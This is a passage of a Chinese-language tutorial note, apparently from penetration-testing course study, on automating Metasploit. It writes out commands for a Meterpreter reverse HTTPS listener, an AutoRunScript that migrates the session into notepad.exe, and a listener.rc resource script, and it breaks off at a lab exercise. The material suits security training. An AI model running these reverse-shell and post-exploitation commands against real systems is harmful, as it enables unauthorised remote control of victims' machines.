自動化 Metasploit
自動化 Metasploit 先執行 Metasploit 然後啟動多/處理程序模組 use exploit/multi/handler set PAYLOAD windows/meterpreter_reverse_https set LHOST 192.168.45.208 set LPORT 443 接著配置 AutoRunScript 選項,以便在建立會話後自動執行模組 此範例,我們使用 post/windows/manage/migrate 模組。 這將導致產生的 Meterpreter 自動啟動後台 notepad.exe 進程並遷移到它 接著將 ExitOnSession 設為 false,以確保偵聽器在建立工作階段後繼續接受新連線 最後添加帶有參數 -z 和 -j 的 run,以將其作為後台作業運行,並阻止我們自動與會話互動 set AutoRunScript post/windows/manage/migrate set ExitOnSession false run -z -j 現在,讓我們儲存腳本,建立一個 listener.rc 將上述指令通通包進去 輸入 msfconsole 並將資源腳本作為 -r 的參數來啟動 Metasploit 指令 sudo msfconsole -r listener.rc 跟上述手動執行結果一樣,啟動後直接 listen 443 一樣透過 met.exe 看到自動連到 443,然後腳本自動執行 migrate 到記事本了 上述是我們自己建立的一個腳本,事實上在 Metasploit 中有許多自動化的腳本位於 Metasploit 目錄的 script/resource/ 目錄中可供直接使用 └─$ ls -l /usr/share/metasploit-framework/scripts/resource 設定 RHOST 時使用 set RHOST 但若要設定全域設定可以用 setg RHOST,取消是 unsetg RHOST portscan.rc 掃描的第一個 Port 是 7 └─$ cat /usr/share/metasploit-framework/scripts/resource/portscan.rc 練習 3 靶機 192.168.186.225/226 有一...